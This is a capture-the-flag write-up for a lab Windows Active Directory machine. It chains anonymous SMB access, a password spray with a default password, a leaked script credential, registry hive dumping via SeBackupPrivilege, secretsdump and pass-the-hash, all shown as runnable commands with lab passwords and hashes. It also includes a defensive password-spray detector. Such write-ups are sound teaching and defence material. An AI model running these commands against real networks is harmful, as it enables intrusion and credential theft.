Cicada
Easy Windows Active Directory
Tags: SMB, Password Spray, secretsdump
Easy Windows Active Directory machine. Anonymous SMB access exposes an HR notice with a default password. Password spraying identifies the valid user, whose credentials are later found in a backup script on a share — leading to a full domain compromise via secretsdump.
User Flag: obtained via emily.oscars
Root Flag: obtained via Administrator hash
01 Reconnaissance

Full port scan reveals a standard Windows AD target — DNS, Kerberos, LDAP, SMB, WinRM. Clock skew of +7h noted for any future Kerberos operations.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.231.149
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
389/tcp  open  ldap          Domain: cicada.htb
445/tcp  open  microsoft-ds
5985/tcp open  http          WinRM
|_clock-skew: mean: 7h00m01s
finding: standard AD stack. SMB on 445 and WinRM on 5985 are the primary attack surface. +7h clock skew noted.
02 SMB Enumeration

Anonymous SMB access is enabled. The HR share contains a notice to new hires with a default password in plaintext. The DEV share contains a PowerShell backup script with hardcoded credentials.

SMB shares
$ nxc smb 10.129.231.149 -u guest -p '' --shares
HR      READ
DEV     READ
IPC$    READ
$ smbclient //10.129.231.149/HR -N
smb: \> get "Notice from HR.txt"

The HR notice reveals the default password for new hires:

Notice from HR.txt
Dear new hire!
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
Please change it on first login.

Now enumerate domain users via RID brute-force to build a spray target list:

RID brute
$ nxc smb 10.129.231.149 -u guest -p '' --rid-brute
500:  CICADA\Administrator
501:  CICADA\Guest
502:  CICADA\krbtgt
1104: CICADA\john.smoulder
1105: CICADA\sarah.dantelia
1106: CICADA\michael.wrightson
1108: CICADA\david.orelious
1109: CICADA\emily.oscars
finding: 5 domain users enumerated. Default password from HR notice ready to spray.
03 Password Spray

Spray the default password against all enumerated users. Only one account hasn't changed it yet.

password spray
$ nxc smb 10.129.231.149 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
CICADA\john.smoulder      [-] STATUS_LOGON_FAILURE
CICADA\sarah.dantelia     [-] STATUS_LOGON_FAILURE
CICADA\michael.wrightson  [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
CICADA\david.orelious     [-] STATUS_LOGON_FAILURE
CICADA\emily.oscars       [-] STATUS_LOGON_FAILURE
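From the defender's side, the spray above leaves a very recognisable trace in the domain controller's Security log: one source address, one failed logon per account in quick succession, and a single success in the middle. The detector below is an added example, not part of the original writeup; the log line format, timestamps and source IPs are constructed assumptions modelled on event IDs 4625 (failure) and 4624 (success).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines (assumed format: timestamp, event id, account,
# source IP), modelled on Security log events 4625 (failed) and 4624 (success).
# One source tries the same password against every enumerated user; the one
# account still on the default password logs on successfully mid-run.
# The second source is a single failure, not a spray.
SAMPLE_LOG = """\
2024-09-28T10:00:01 4625 john.smoulder 10.10.14.5
2024-09-28T10:00:02 4625 sarah.dantelia 10.10.14.5
2024-09-28T10:00:03 4624 michael.wrightson 10.10.14.5
2024-09-28T10:00:04 4625 david.orelious 10.10.14.5
2024-09-28T10:00:05 4625 emily.oscars 10.10.14.5
2024-09-28T10:30:00 4625 emily.oscars 10.10.14.77
"""


def parse_line(line):
    ts, eid, acct, src = line.split()
    return {"ts": datetime.fromisoformat(ts), "eid": eid, "acct": acct, "src": src}


def detect_spray(lines, window=timedelta(minutes=5), min_accounts=3):
    """Flag any source that fails logons for >= min_accounts distinct accounts
    inside one sliding window, and report successes from that source in the
    same window: a spray that produced a hit is what an analyst needs first."""
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        failures = [e for e in evs if e["eid"] == "4625"]
        for i, first in enumerate(failures):
            win = [e for e in failures[i:] if e["ts"] - first["ts"] <= window]
            accounts = {e["acct"] for e in win}
            if len(accounts) < min_accounts:
                continue
            end = win[-1]["ts"]
            hits = sorted(e["acct"] for e in evs
                          if e["eid"] == "4624" and first["ts"] <= e["ts"] <= end)
            alerts[src] = {"accounts": sorted(accounts), "successes": hits}
            break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_LOG.splitlines()).items():
        print(f"spray from {src}: {len(info['accounts'])} accounts, hits={info['successes']}")
```

Tune `window` and `min_accounts` to the environment; a low per-account failure count is exactly what makes a spray invisible to lockout-based alerting, so the signal has to come from the number of distinct accounts per source.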

With michael.wrightson credentials, enumerate the DEV share — a PowerShell backup script leaks emily.oscars's password in plaintext:

Backup_script.ps1
$ smbclient //10.129.231.149/DEV -U 'michael.wrightson%Cicada$M6Corpb*@Lp#nZp!8'
smb: \> get Backup_script.ps1
# Contents:
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
credentials: emily.oscars : Q!3@Lp#M6b*7t*Vt
04 Foothold — WinRM as emily.oscars

emily.oscars is a member of the Backup Operators group — a privileged group that can read any file including the SAM and SYSTEM hives.

evil-winrm
$ evil-winrm -i 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
*Evil-WinRM* PS C:\Users\emily.oscars\Desktop> type user.txt
3d5b2a************************
user flag obtained.
05 Privilege Escalation — Backup Operators → secretsdump

Members of Backup Operators have SeBackupPrivilege — they can copy any file bypassing ACLs, including the registry hives. Dump SAM and SYSTEM, then use secretsdump locally to extract the Administrator hash.

dump hives
# dump registry hives (SeBackupPrivilege allows this)
*EWR* reg save HKLM\SAM C:\Temp\sam.hive
*EWR* reg save HKLM\SYSTEM C:\Temp\system.hive
# download to attacker
*EWR* download C:\Temp\sam.hive
*EWR* download C:\Temp\system.hive
secretsdump
$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Administrator NT hash: 2b87e7c93a3e8a0ea4a581937016f341
06 Root Flag

Pass-the-Hash with the Administrator NT hash for a full domain shell.

PTH → root
$ evil-winrm -i 10.129.231.149 -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
*EWR* type C:\Users\Administrator\Desktop\root.txt
a98dee7************************
chain: SMB guest → HR default password → spray → michael.wrightson → DEV share → emily.oscars creds → Backup Operators → SeBackupPrivilege → secretsdump → Administrator PTH